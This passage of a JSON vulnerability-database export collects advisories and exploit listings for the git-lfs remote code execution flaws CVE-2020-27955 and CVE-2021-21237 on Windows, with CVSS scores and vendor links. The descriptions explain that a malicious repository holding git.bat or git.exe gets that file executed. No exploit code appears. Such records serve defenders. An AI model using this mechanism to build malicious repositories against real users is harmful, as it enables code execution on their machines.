"CVE-2021-21237"], "modified": "2021-09-16T05:28:41", "id": "BAM-21267", "href": "https://jira.atlassian.com/browse/BAM-21267", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:40:50", "description": "There was an argument injection vulnerability in SourceTree for Windows introduced through git-lfs. An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "ATLASSIAN:SRCTREEWIN-13410", "href": "https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-17T12:28:43", "description": "github.com/git-lfs/git-lfs is vulnerable to remote code execution. The vulnerability exists in 'ExecCommand' function of `subprocess_windows.go` which allows an attacker to inject and execute codes in the root directory of a malicious repository by simply adding an executable files. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T09:57:20", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-04-19T18:33:50", "id": "VERACODE:34211", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34211/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:24:58", "description": "Git LFS 2.12.0 allows Remote Code Execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | Only affects git-lfs on Windows so Ubuntu is not affected.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "ubuntucve", "title": "CVE-2020-27955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-05T00:00:00", "id": "UB:CVE-2020-27955", "href": "https://ubuntu.com/security/CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T13:23:03", "description": "Git LFS is a command line extension for managing large files with Git. On\nWindows, if Git LFS operates on a malicious repository with a git.bat or\ngit.exe file in the current directory, that program would be executed,\npermitting the attacker to execute arbitrary code. This does not affect\nUnix systems. This is the result of an incomplete fix for CVE-2020-27955.\nThis issue occurs because on Windows, Go includes (and prefers) the current\ndirectory when the name of a command run does not contain a directory\nseparator. Other than avoiding untrusted repositories or using a different\noperating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T00:00:00", "type": "ubuntucve", "title": "CVE-2021-21237", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-15T00:00:00", "id": "UB:CVE-2021-21237", "href": "https://ubuntu.com/security/CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T05:59:03", "description": "Git LFS 2.12.0 allows Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-05T15:15:00", "type": "debiancve", "title": "CVE-2020-27955", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2020-11-05T15:15:00", "id": "DEBIANCVE:CVE-2020-27955", "href": "https://security-tracker.debian.org/tracker/CVE-2020-27955", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-04T05:59:03", "description": "Git LFS is a command line extension for managing large files with Git. On Windows, if Git LFS operates on a malicious repository with a git.bat or git.exe file in the current directory, that program would be executed, permitting the attacker to execute arbitrary code. This does not affect Unix systems. This is the result of an incomplete fix for CVE-2020-27955. This issue occurs because on Windows, Go includes (and prefers) the current directory when the name of a command run does not contain a directory separator. Other than avoiding untrusted repositories or using a different operating system, there is no workaround. This is fixed in v2.13.2.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T18:15:00", "type": "debiancve", "title": "CVE-2021-21237", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-01-15T18:15:00", "id": "DEBIANCVE:CVE-2021-21237", "href": "https://security-tracker.debian.org/tracker/CVE-2021-21237", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-10T14:58:56", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-10T21:31:24", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-02-11T07:12:46", "id": "8C51F794-A253-5F1E-B5D0-0B1213520826", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:00", "description": "# cve-2020-27955\ncve-2020-27955\n\n#### \u590d\u73b0\n1. \u521b\u5efagith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-28T13:27:27", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-03-05T08:15:45", "id": "D56AA8A3-479D-504C-8FD5-DDF516063BD9", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:12:10", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-05-25T15:26:35", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-25T15:28:08", "id": "12E6F100-A1FF-594C-99C4-DB7C8CE01C78", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:28", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-30T09:38:48", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-02T15:22:19", "id": "4B231570-F0E2-58B6-8CC3-9375EA7D545C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:17:20", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-02T12:32:08", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-08-02T13:13:28", "id": "FF9E9079-09ED-5DA5-A816-5FEB139C03E5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-26T12:40:01", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (Go...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-04T16:43:04", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-07-26T06:31:01", "id": "161C23A4-C55D-51E1-879C-C0118D1D6700", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-13T23:00:37", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-03T17:14:22", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-08-13T17:42:30", "id": "FFCE0773-643A-5405-B466-F165D1B6EA7C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-17T10:22:15", "description": "# Git-lfs Remote Code Execution (RCE) exploit CVE-2020-27955 (.b...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-30T14:25:42", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-04-30T14:29:08", "id": "30298115-342F-55E1-9EAC-729DC1B3D181", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-16T09:22:22", "description": "# CVE-2020-27955\n\nThanks h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-24T02:40:04", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-08-16T07:21:56", "id": "DBF83092-127A-57DA-9F19-F1D868B01365", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-18T14:46:09", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T10:30:28", "type": "githubexploit", "title": "Exploit for Uncontrolled Search Path Element in Git Large File Storage Project Git Large File Storage", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2021-05-13T10:33:03", "id": "78AAAA4C-FD3D-5AE7-B155-5E7646CA947E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-26T05:26:42", "description": "# CVE-2020-14181\nAffected versions of Atlassian Jira Server and ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-26T17:07:28", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Atlassian Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181", "CVE-2020-1481"], "modified": "2021-12-31T05:27:00", "id": "A542A2D9-7FFB-5124-B36F-4F110A2146F2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T18:07:01", "description": "# CVE-2020-14181\nPoc for CVE-2020-14181\n\nAffected versions of At...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-05T07:48:19", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Atlassian Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14181", "CVE-2020-1481"], "modified": "2021-03-09T12:09:03", "id": "A7786E83-AFF8-5B96-9254-7E1040916083", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "metasploit": [{"lastseen": "2022-08-18T18:45:28", "description": "A critical vulnerability (CVE-2020-27955) in Git Large File Storage (Git LFS), an open source Git extension for versioning large files, allows attackers to achieve 